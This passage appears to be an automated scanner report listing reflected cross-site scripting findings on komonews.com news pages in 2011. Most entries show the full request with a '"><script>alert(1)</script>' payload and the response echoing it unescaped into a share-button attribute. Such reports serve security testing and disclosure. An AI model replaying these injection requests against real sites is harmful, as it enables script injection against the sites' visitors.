Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 62451


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   An appetiz
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116652534.html?7d385"><script>alert(1)</script>c66634aa9ad=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.410. http://www.komonews.com/news/116694569.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/116694569.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59b98"><script>alert(1)</script>98d22e6ce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116694569.html?59b98"><script>alert(1)</script>98d22e6ce5=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 62501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Winter Sto
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694569.html?59b98"><script>alert(1)</script>98d22e6ce5=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.411. http://www.komonews.com/news/116694569.html [skipthumb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/116694569.html

Issue detail

The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5bc"><script>alert(1)</script>3578d8357a5 was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116694569.html?skipthumb=Yca5bc"><script>alert(1)</script>3578d8357a5 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 62511


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Winter Sto
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694569.html?skipthumb=Yca5bc"><script>alert(1)</script>3578d8357a5" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.412. http://www.komonews.com/news/116694614.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/116694614.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb865"><script>alert(1)</script>0db0d2d78f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116694614.html?bb865"><script>alert(1)</script>0db0d2d78f9=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54796


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Police off
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694614.html?bb865"><script>alert(1)</script>0db0d2d78f9=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.413. http://www.komonews.com/news/116707379.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/116707379.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 250e3"><script>alert(1)</script>284a71de2fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116707379.html?250e3"><script>alert(1)</script>284a71de2fb=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 61086


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Tuba Man k
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116707379.html?250e3"><script>alert(1)</script>284a71de2fb=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.414. http://www.komonews.com/news/116727124.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/116727124.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7249e"><script>alert(1)</script>3476c1f423c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116727124.html?7249e"><script>alert(1)</script>3476c1f423c=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 63420


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Snow begin
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116727124.html?7249e"><script>alert(1)</script>3476c1f423c=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.415. http://www.komonews.com/news/boeing/116707614.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/boeing/116707614.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6391"><script>alert(1)</script>5ee4a5ffd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/boeing/116707614.html?e6391"><script>alert(1)</script>5ee4a5ffd14=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 59072


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Aircraft t
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/boeing/116707614.html?e6391"><script>alert(1)</script>5ee4a5ffd14=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.416. http://www.komonews.com/news/business/116735244.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/business/116735244.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e305c"><script>alert(1)</script>26818fe7053 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116735244.html?e305c"><script>alert(1)</script>26818fe7053=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Foreclosur
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116735244.html?e305c"><script>alert(1)</script>26818fe7053=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.417. http://www.komonews.com/news/business/116739564.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/business/116739564.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdbc4"><script>alert(1)</script>be01c09fb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116739564.html?fdbc4"><script>alert(1)</script>be01c09fb7=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53713


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Top SEC la
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116739564.html?fdbc4"><script>alert(1)</script>be01c09fb7=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.418. http://www.komonews.com/news/business/116739939.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/business/116739939.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99328"><script>alert(1)</script>147a401db4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116739939.html?99328"><script>alert(1)</script>147a401db4e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   HP shares
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116739939.html?99328"><script>alert(1)</script>147a401db4e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.419. http://www.komonews.com/news/business/116740159.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/business/116740159.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b05d"><script>alert(1)</script>15b6b16a6d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116740159.html?6b05d"><script>alert(1)</script>15b6b16a6d7=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55979


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Fidelity:
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116740159.html?6b05d"><script>alert(1)</script>15b6b16a6d7=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.420. http://www.komonews.com/news/business/116740389.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/business/116740389.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9bd1"><script>alert(1)</script>5502d67dd02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116740389.html?d9bd1"><script>alert(1)</script>5502d67dd02=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54978


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   FDIC says
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116740389.html?d9bd1"><script>alert(1)</script>5502d67dd02=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.421. http://www.komonews.com/news/consumer/116673109.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/consumer/116673109.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e470e"><script>alert(1)</script>85c862ec889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/consumer/116673109.html?e470e"><script>alert(1)</script>85c862ec889=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55034


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Not too la
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/consumer/116673109.html?e470e"><script>alert(1)</script>85c862ec889=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.422. http://www.komonews.com/news/consumer/116704069.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/consumer/116704069.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299af"><script>alert(1)</script>0d1f4bdf7a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/consumer/116704069.html?299af"><script>alert(1)</script>0d1f4bdf7a1=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54318


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Your credi
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/consumer/116704069.html?299af"><script>alert(1)</script>0d1f4bdf7a1=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.423. http://www.komonews.com/news/entertainment/116123569.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116123569.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24b06"><script>alert(1)</script>51dacf53101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116123569.html?24b06"><script>alert(1)</script>51dacf53101=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:17 GMT
Connection: close
